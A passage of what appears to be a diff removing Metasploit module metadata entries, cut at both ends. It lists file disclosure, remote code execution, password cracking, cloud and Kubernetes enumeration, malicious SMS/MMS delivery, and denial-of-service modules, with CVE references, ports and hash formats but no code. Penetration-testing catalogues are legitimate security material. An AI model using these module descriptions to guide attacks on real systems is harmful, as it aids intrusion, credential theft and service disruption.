"OSVDB-26772", - "BID-18744", - "CVE-2006-3392", - "US-CERT-VU-999601", - "URL-https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/" - ], - "platform": "", - "arch": "", - "rport": 10000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/webmin/file_disclosure.rb", - "is_install_path": true, - "ref_name": "admin/webmin/file_disclosure", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/wemo/crockpot": { - "name": "Belkin Wemo-Enabled Crock-Pot Remote Control", - "fullname": "auxiliary/admin/wemo/crockpot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "wvu " - ], - "description": "This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.", - "references": [ - "URL-http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html", - "URL-https://www.belkin.com/us/support-article?articleNum=101177", - "URL-http://www.wemo.com/" - ], - "platform": "", - "arch": "", - "rport": 49152, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/wemo/crockpot.rb", - "is_install_path": true, - "ref_name": "admin/wemo/crockpot", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Cook", - "description": "Cook stuff" - }, - { - "name": "Stop", - "description": "Stop cooking" - } - ] - }, - "auxiliary_admin/zend/java_bridge": { - "name": "Zend Server Java Bridge Design Flaw Remote Code Execution", - "fullname": "auxiliary/admin/zend/java_bridge", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-28", - "type": "auxiliary", - "author": [ - "ikki", - "MC " - ], - "description": "This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.", - "references": [ - "OSVDB-71420", - "ZDI-11-113", - "EDB-17078" - ], - "platform": "", - "arch": "", - "rport": 10001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/zend/java_bridge.rb", - "is_install_path": true, - "ref_name": "admin/zend/java_bridge", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_analyze/apply_pot": { - "name": "Apply Pot File To Hashes", - "fullname": "auxiliary/analyze/apply_pot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/apply_pot.rb", - "is_install_path": true, - "ref_name": "analyze/apply_pot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_aix": { - "name": "Password Cracker: AIX", - "fullname": "auxiliary/analyze/crack_aix", - "aliases": [ - "auxiliary/analyze/jtr_aix" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine ", - "hdm ", - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from passwd files on AIX systems. These utilize DES hashing.\n DES is format 1500 in Hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_aix.rb", - "is_install_path": true, - "ref_name": "analyze/crack_aix", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_databases": { - "name": "Password Cracker: Databases", - "fullname": "auxiliary/analyze/crack_databases", - "aliases": [ - "auxiliary/analyze/jtr_mssql_fast", - "auxiliary/analyze/jtr_mysql_fast", - "auxiliary/analyze/jtr_oracle_fast", - "auxiliary/analyze/jtr_postgres_fast" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine ", - "hdm ", - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from the mssql_hashdump, mysql_hashdump, postgres_hashdump, or oracle_hashdump modules.\n Passwords that have been successfully cracked are then saved as proper credentials.\n Due to the complexity of some of the hash types, they can be very slow. Setting the\n ITERATION_TIMEOUT is highly recommended.\n MSSQL is 131, 132, and 1731 in hashcat.\n MYSQL is 200, and 300 in hashcat.\n ORACLE is 112, and 12300 in hashcat.\n POSTGRES is 12 in hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_databases.rb", - "is_install_path": true, - "ref_name": "analyze/crack_databases", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_linux": { - "name": "Password Cracker: Linux", - "fullname": "auxiliary/analyze/crack_linux", - "aliases": [ - "auxiliary/analyze/jtr_linux" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine ", - "hdm ", - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from unshadowed passwd files from Unix/Linux systems. The module will only crack\n MD5, BSDi and DES implementations by default. However, it can also crack\n Blowfish and SHA(256/512), but it is much slower.\n MD5 is format 500 in hashcat.\n DES is format 1500 in hashcat.\n BSDI is format 12400 in hashcat.\n BLOWFISH is format 3200 in hashcat.\n SHA256 is format 7400 in hashcat.\n SHA512 is format 1800 in hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_linux.rb", - "is_install_path": true, - "ref_name": "analyze/crack_linux", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_mobile": { - "name": "Password Cracker: Mobile", - "fullname": "auxiliary/analyze/crack_mobile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module uses Hashcat to identify weak passwords that have been\n acquired from Android systems. These utilize MD5 or SHA1 hashing.\n Android (Samsung) SHA1 is format 5800 in Hashcat. Android\n (non-Samsung) SHA1 is format 110 in Hashcat. Android MD5 is format 10.\n JTR does not support Android hashes at the time of writing.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_mobile.rb", - "is_install_path": true, - "ref_name": "analyze/crack_mobile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - } - ] - }, - "auxiliary_analyze/crack_osx": { - "name": "Password Cracker: OSX", - "fullname": "auxiliary/analyze/crack_osx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from OSX systems. The module will only crack xsha from OSX 10.4-10.6, xsha512\n from 10.7, and PBKDF2 from OSX 10.8+.\n XSHA is 122 in hashcat.\n XSHA512 is 1722 in hashcat.\n PBKDF2 (PBKDF2-HMAC-SHA512) is 7100 in hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_osx.rb", - "is_install_path": true, - "ref_name": "analyze/crack_osx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_webapps": { - "name": "Password Cracker: Webapps", - "fullname": "auxiliary/analyze/crack_webapps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from various web applications.\n Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n PHPass uses phpass which is 400 in hashcat.\n Mediawiki is MD5 based and is 3711 in hashcat.\n Apache Superset, some Flask and Werkzeug apps is pbkdf2-sha256 and is 10900 in hashcat", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_webapps.rb", - "is_install_path": true, - "ref_name": "analyze/crack_webapps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_windows": { - "name": "Password Cracker: Windows", - "fullname": "auxiliary/analyze/crack_windows", - "aliases": [ - "auxiliary/analyze/jtr_windows_fast" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine ", - "hdm ", - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from Windows systems.\n LANMAN is format 3000 in hashcat.\n NTLM is format 1000 in hashcat.\n MSCASH is format 1100 in hashcat.\n MSCASH2 is format 2100 in hashcat.\n NetNTLM is format 5500 in hashcat.\n NetNTLMv2 is format 5600 in hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_windows.rb", - "is_install_path": true, - "ref_name": "analyze/crack_windows", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/modbus_zip": { - "name": "Extract zip from Modbus communication", - "fullname": "auxiliary/analyze/modbus_zip", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "José Diogo Monteiro ", - "Luis Rosa " - ], - "description": "This module is able to extract a zip file sent through Modbus from a pcap.\n Tested with Schneider TM221CE16R.", - "references": [], - "platform": "", - "arch": "", - "rport": 502, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/modbus_zip.rb", - "is_install_path": true, - "ref_name": "analyze/modbus_zip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_bnat/bnat_router": { - "name": "BNAT Router", - "fullname": "auxiliary/bnat/bnat_router", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "bannedit ", - "Jonathan Claudius" - ], - "description": "This module will properly route BNAT traffic and allow for connections to be\n established to machines on ports which might not otherwise be accessible.", - "references": [ - "URL-https://github.com/claudijd/bnat", - "URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 12:09:08 +0000", - "path": "/modules/auxiliary/bnat/bnat_router.rb", - "is_install_path": true, - "ref_name": "bnat/bnat_router", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_bnat/bnat_scan": { - "name": "BNAT Scanner", - "fullname": "auxiliary/bnat/bnat_scan", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "bannedit ", - "Jonathan Claudius " - ], - "description": "This module is a scanner which can detect Broken NAT (network address translation)\n implementations, which could result in an inability to reach ports on remote\n machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.", - "references": [ - "URL-https://github.com/claudijd/bnat", - "URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 12:09:08 +0000", - "path": "/modules/auxiliary/bnat/bnat_scan.rb", - "is_install_path": true, - "ref_name": "bnat/bnat_scan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/hwbridge/connect": { - "name": "Hardware Bridge Session Connector", - "fullname": "auxiliary/client/hwbridge/connect", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Craig Smith" - ], - "description": "The Hardware Bridge (HWBridge) is a standardized method for\n Metasploit to interact with Hardware Devices. This extends\n the normal exploit capabilities to the non-ethernet realm and\n enables direct hardware and alternative bus manipulations. You\n must have compatible bridging hardware attached to this machine or\n reachable on your network to use any HWBridge exploits.\n\n Use this exploit module to connect the physical HWBridge which\n will start an interactive hwbridge session. You can launch a hwbridge\n server locally by using compliant hardware and executing the local_hwbridge\n module. After that module has started, pass the HWBRIDGE_BASE_URL\n options to this connector module.", - "references": [ - "URL-https://web.archive.org/web/20170206145056/http://opengarages.org/hwbridge/" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/hwbridge/connect.rb", - "is_install_path": true, - "ref_name": "client/hwbridge/connect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/iec104/iec104": { - "name": "IEC104 Client Utility", - "fullname": "auxiliary/client/iec104/iec104", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Michael John " - ], - "description": "This module allows sending 104 commands.", - "references": [], - "platform": "", - "arch": "", - "rport": 2404, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/iec104/iec104.rb", - "is_install_path": true, - "ref_name": "client/iec104/iec104", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "SEND_COMMAND", - "description": "Send command to device" - } - ] - }, - "auxiliary_client/mms/send_mms": { - "name": "MMS Client", - "fullname": "auxiliary/client/mms/send_mms", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sinn3r " - ], - "description": "This module sends an MMS message to multiple phones of the same carrier.\n You can use it to send a malicious attachment to phones.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/mms/send_mms.rb", - "is_install_path": true, - "ref_name": "client/mms/send_mms", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/sms/send_text": { - "name": "SMS Client", - "fullname": "auxiliary/client/sms/send_text", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sinn3r " - ], - "description": "This module sends a text message to multiple phones of the same carrier.\n You can use it to send a malicious link to phones.\n\n Please note that you do not use this module to send a media file (attachment).\n In order to send a media file, please use auxiliary/client/mms/send_mms instead.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/sms/send_text.rb", - "is_install_path": true, - "ref_name": "client/sms/send_text", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/smtp/emailer": { - "name": "Generic Emailer (SMTP)", - "fullname": "auxiliary/client/smtp/emailer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "et " - ], - "description": "This module can be used to automate email delivery.\n This code is based on Joshua Abraham's email script for social\n engineering.", - "references": [ - "URL-http://spl0it.org/" - ], - "platform": "", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/smtp/emailer.rb", - "is_install_path": true, - "ref_name": "client/smtp/emailer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/telegram/send_message": { - "name": "Telegram Message Client", - "fullname": "auxiliary/client/telegram/send_message", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ege Balcı ", - "Gaurav Purswani" - ], - "description": "This module can be used to send a document and/or message to\n multiple chats on telegram. Please refer to the module\n documentation for info on how to retrieve the bot token and corresponding chat\n ID values.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:04:17 +0000", - "path": "/modules/auxiliary/client/telegram/send_message.rb", - "is_install_path": true, - "ref_name": "client/telegram/send_message", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/aws/enum_ec2": { - "name": "Amazon Web Services EC2 instance enumeration", - "fullname": "auxiliary/cloud/aws/enum_ec2", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Aaron Soto ", - "RageLtMan " - ], - "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all EC2 instances associated\n with the account", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-06 22:49:03 +0000", - "path": "/modules/auxiliary/cloud/aws/enum_ec2.rb", - "is_install_path": true, - "ref_name": "cloud/aws/enum_ec2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/aws/enum_iam": { - "name": "Amazon Web Services IAM credential enumeration", - "fullname": "auxiliary/cloud/aws/enum_iam", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Aaron Soto " - ], - "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all IAM credentials associated\n with the account", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-06 22:49:03 +0000", - "path": "/modules/auxiliary/cloud/aws/enum_iam.rb", - "is_install_path": true, - "ref_name": "cloud/aws/enum_iam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/aws/enum_s3": { - "name": "Amazon Web Services S3 instance enumeration", - "fullname": "auxiliary/cloud/aws/enum_s3", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Aaron Soto " - ], - "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all S3 buckets associated\n with the account", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-06 22:49:03 +0000", - "path": "/modules/auxiliary/cloud/aws/enum_s3.rb", - "is_install_path": true, - "ref_name": "cloud/aws/enum_s3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/aws/enum_ssm": { - "name": "Amazon Web Services EC2 SSM enumeration", - "fullname": "auxiliary/cloud/aws/enum_ssm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "RageLtMan " - ], - "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all SSM-enabled EC2 instances\n accessible to the account. Once enumerated as SSM-enabled, the\n instances can be controlled using out-of-band WebSocket sessions\n provided by the AWS API (nominally, privileged out of the box).\n This module provides not only the API enumeration identifying EC2\n instances accessible via SSM with given credentials, but enables\n session initiation for all identified targets (without requiring\n target-level credentials) using the CreateSession datastore option.\n The module also provides an EC2 ID filter and a limiting throttle\n to prevent session stampedes or expensive messes.", - "references": [ - "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-06-03 11:02:15 +0000", - "path": "/modules/auxiliary/cloud/aws/enum_ssm.rb", - "is_install_path": true, - "ref_name": "cloud/aws/enum_ssm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [], - "Stability": [ - "crash-safe" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_cloud/kubernetes/enum_kubernetes": { - "name": "Kubernetes Enumeration", - "fullname": "auxiliary/cloud/kubernetes/enum_kubernetes", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "alanfoster", - "Spencer McIntyre" - ], - "description": "Enumerate a Kubernetes API to report useful resources such as available namespaces,\n pods, secrets, etc.\n\n Useful resources will be highlighted using the HIGHLIGHT_NAME_PATTERN option.", - "references": [], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2021-10-07 12:35:53 +0000", - "path": "/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb", - "is_install_path": true, - "ref_name": "cloud/kubernetes/enum_kubernetes", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "all", - "description": "enumerate all resources" - }, - { - "name": "auth", - "description": "enumerate auth" - }, - { - "name": "namespace", - "description": "enumerate namespace" - }, - { - "name": "namespaces", - "description": "enumerate namespaces" - }, - { - "name": "pod", - "description": "enumerate pod" - }, - { - "name": "pods", - "description": "enumerate pods" - }, - { - "name": "secret", - "description": "enumerate secret" - }, - { - "name": "secrets", - "description": "enumerate secrets" - }, - { - "name": "version", - "description": "enumerate version" - } - ] - }, - "auxiliary_crawler/msfcrawler": { - "name": "Metasploit Web Crawler", - "fullname": "auxiliary/crawler/msfcrawler", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "et " - ], - "description": "This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.", - "references": [], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-04-02 15:48:42 +0000", - "path": "/modules/auxiliary/crawler/msfcrawler.rb", - "is_install_path": true, - "ref_name": "crawler/msfcrawler", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/android/android_stock_browser_iframe": { - "name": "Android Stock Browser Iframe DOS", - "fullname": "auxiliary/dos/android/android_stock_browser_iframe", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-12-01", - "type": "auxiliary", - "author": [ - "Jean Pascal Pereira", - "Jonathan Waggoner" - ], - "description": "This module exploits a vulnerability in the native browser that comes with Android 4.0.3.\n If successful, the browser will crash after viewing the webpage.", - "references": [ - "PACKETSTORM-118539", - "CVE-2012-6301" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb", - "is_install_path": true, - "ref_name": "dos/android/android_stock_browser_iframe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/apple_ios/webkit_backdrop_filter_blur": { - "name": "iOS Safari Denial of Service with CSS", - "fullname": "auxiliary/dos/apple_ios/webkit_backdrop_filter_blur", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-09-15", - "type": "auxiliary", - "author": [ - "Sabri Haddouche" - ], - "description": "This module exploits a vulnerability in WebKit on Apple iOS.\n If successful, the device will restart after viewing the webpage.", - "references": [ - "URL-https://twitter.com/pwnsdx/status/1040944750973595649", - "URL-http://web.archive.org/web/20220706175501/https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea", - "URL-https://nbulischeck.github.io/apple-safari-crash" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb", - "is_install_path": true, - "ref_name": "dos/apple_ios/webkit_backdrop_filter_blur", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/cisco/cisco_7937g_dos": { - "name": "Cisco 7937G Denial-of-Service Attack", - "fullname": "auxiliary/dos/cisco/cisco_7937g_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-02", - "type": "auxiliary", - "author": [ - "Cody Martin" - ], - "description": "This module exploits a bug in how the conference station \n\thandles incoming SSH connections that provide an incompatible \n\tkey exchange. By connecting with an incompatible key exchange, \n\tthe device becomes nonresponsive until it is manually power\n\tcycled.", - "references": [ - "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", - "CVE-2020-16138" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - 